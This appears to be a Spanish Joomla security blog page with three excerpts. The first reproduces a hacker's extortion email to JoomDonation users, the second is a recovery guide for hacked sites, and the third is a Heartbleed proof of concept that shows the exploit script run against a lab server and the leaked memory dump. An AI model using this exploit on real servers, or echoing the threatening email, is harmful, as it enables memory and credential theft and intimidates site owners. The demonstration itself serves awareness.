JoomDonation, hackeado

Icono alertaEn el día de ayer, muchos usuarios de JoomDonation recibieron el siguiente email:

 

 

 

How the hell are you? No need to ask, I’m fine!

I’m the one who has hacked all of your sites, emails, accounts etc. that has been using JoomDonation.com site/components. Scaring? Hell Yea :-)

About 15 months ago, I was able to penetrate into several Joomla sites. One of these luckies was JoomDonation.com After a while I realised that their crappy components were used by other Joomla developers too so I injected my shells into JoomDonation.com components. As per result, I’ve a list of 300000+ Joomla users+emails and you’re just one of them, lucky thing :-)

..

Yea Yea I know you all have scanners, firewalls, admin tools etc installed on your server/site but you what? F*ck em all. They’re just noob tools. Think about, I’ve injected my own shells into 10000+ Joomla sites and none of you or your magic tools have been awared of.

WARNING: You have 5 days to clean up your sites then my bot will start putting your sites down. If your site was not so valuable for me, removing the components would be enough. If so, then I will most probably blackmail you soon :-)

Want an advice from a hacker? Don’t use any script from Thailand/Vietnam developers, their code is so crappy :-) Try Indian quality.

This email was sent to all JoomDonation.com users. We’ll meet again if you have accounts registered to other Joomla developers :-)

Después del revuelo inicial parece que, efectivamente, el hacker ha accedido a la base de datos, extrayendo información como el nombre y el email, y ha mandado correos electrónicos a todos los que allí figuran. La técnica usada ha sido aprovechar una vulnerabilidad en el servidor que aloja su web (sin Firewall...) para acceder a dicha información.

El desarrollador,Tuan Pham Ngoc, afirma que no existe ninguna puerta trasera en sus aplicaciones, tal y como afirma el hacker.

Saludos!

Me han hackeado, ¬Ņy ahora qu√©?

S√≠, aquello que pensabas que no pod√≠a acurrir ha pasado: tu web ha sido hackeada. Una vez pasado el susto inicial, seguramente las preguntas que te har√°s ser√°n: ¬Ņc√≥mo puedo recuperar mi sitio? y ¬Ņqu√© puedo hacer para evitar un nuevo hackeo?

¬ŅC√≥mo puedo recuperar mi sitio?

Bien, lo primero que hemos de asumir es que TODO ha sido comprometido. El primer paso es redireccionar nuestra web a una página de "mantenimiento" o similar para poder trabajar tranquilos. Esto es fácil de hacer desde tu proveedor web, cambiando la ruta de su sitio a una carpeta donde tengas un index.html que muestre que el sitio está temporalmente fuera de servicio. También podemos crear un fichero .htaccess para redireccionar todas las peticiones excepto la de nuestra direccion IP, aunque esto es un poco más complicado.

magazine.joomla.org/issues/issue-feb-2011/item/378-how-offline-is-joomla-offline-mode

Una vez hecho esto, debemos cambiar TODAS (s√≠, TODAS) las contrase√Īas que usamos en Joomla: la de la base de datos, la de las cuentas ftp, la de acceso al hosting y, por supuesto, la del Super Administrador.

La opci√≥n m√°s sencilla y r√°pida para tener nuestro sitio online es restaurar nuestra √ļltima copia de seguridad antes de que nuestro sitio fuera hackeado (porque tenemos copia de seguridad RECIENTE, ¬Ņno?).

Sin embargo, es bastante probable que el atacante haya introducido modificaciones o subido archivos que le permitan acceder al sitio en cualquier momento, así que mi recomendación es borrar todos los archivos del sitio web y partir de cero.

En este caso es MUY IMPORTANTE guardar el archivo "configuration.php" y las modificaciones propias sobre las extensiones ANTES de borrar nada. Nos descargamos el paquete de instalación de Joomla!, lo descomprimimos, eliminamos el directorio de instalación (no queremos realizar una instalación nueva) y sobreescribimos TODOS los archivos del servidor. A continuación, restauramos el archivo "configuration.php" y las modificaciones que habíamos guardado.

Si no estamos seguros de que las extensiones est√©n limpias, deberemos realizar el mismo procedimiento seguido con el core: descargar el instalador de cada extensi√≥n y luego sobreescribir los archivos que hayamos modificado por nuestras copias de seguridad. ¬ŅNo tenemos copia de seguridad de las modificaciones? Pues os tocar√° realizar los cambios a mano...

Una vez realizada alguna de estas dos opciones, nuestro sitio ya est√° listo para funcionar de nuevo. S√≠, ya podemos revertir el redireccionamiento del primer paso, pero a√ļn nos queda la (ardua) labor de identificar c√≥mo han hackeado nuestra web.

¬ŅQu√© puedo hacer para evitar un nuevo hackeo?

Leer m√°s:Me han hackeado, ¬Ņy ahora qu√©?

HeartBleed proof of concept - CVE-2014-0160 - Una prueba de concepto

Prueba de concepto bug heartbleedMuuuuuuuuuuuuucho se habl√≥ en los √ļltimos d√≠as (y se sigue hablando de hecho) de este gran tropiezo de OpenSSL llamado "HeartBleed bug", por si no est√°n al tanto pueden pasar por aca¬†o por aca para una mirada en Ingl√©s. La idea de esta entrada es demostrar de manera mas o menos sencilla la potencialidad del problema. Para explotar el bug utilizar√© el peque√Īo pero potente script en python desarrollado por¬†Jared Stafford.

El escenario de prueba es el siguiente:

-Servidor Ubuntu 12.04.4 LTS con Apache y OpenSSL 1.0.1 (vulnerable)
-IP: 172.16.62.149
-Un certificado autofirmado
-Autenticación basic-auth
-Wordpress

Comprobar que el servidor es vulnerable:

Lanzamos manualmente el script para corroborar el estado de debilidad del servidor.

juan@moon:~/pruebas$ ./heartbleed.py 172.16.62.149
Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 58
 ... received message: type = 22, ver = 0302, length = 629
 ... received message: type = 22, ver = 0302, length = 397
 ... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
  0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C  Esta dirección de correo electrónico está protegida contra spambots. Usted necesita tener Javascript activado para poder verla.[...r...
  0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90  .+..H...9.......
  0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0  .w.3....f.....".
  0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00  !.9.8.........5.
  0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................
  0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00  ............3.2.
  0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00  ....E.D...../...
  0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00  A...............
  0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................
  0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00  ..I...........4.

...
  3f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  3f90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  3fa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  3fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  3fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  3fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  3fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  3ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
 
WARNING: server returned more data than it should - server is vulnerable!
 
Excelente, el servidor es efectivamente vulnerable. Lo que vemos como salida es la respuesta del servidor, que casualmente resulta ser el contenido de un buffer interno de OpenSSL en el cu√°l se pueden encontrar cosas interesantes.
 

Prueba de concepto con basic-auth:

Leer m√°s:HeartBleed proof of concept - CVE-2014-0160 - Una prueba de concepto

Free Internet Security - WOT Web of Trust
2011 Blog.
Powered by Joomla 1.7 Templates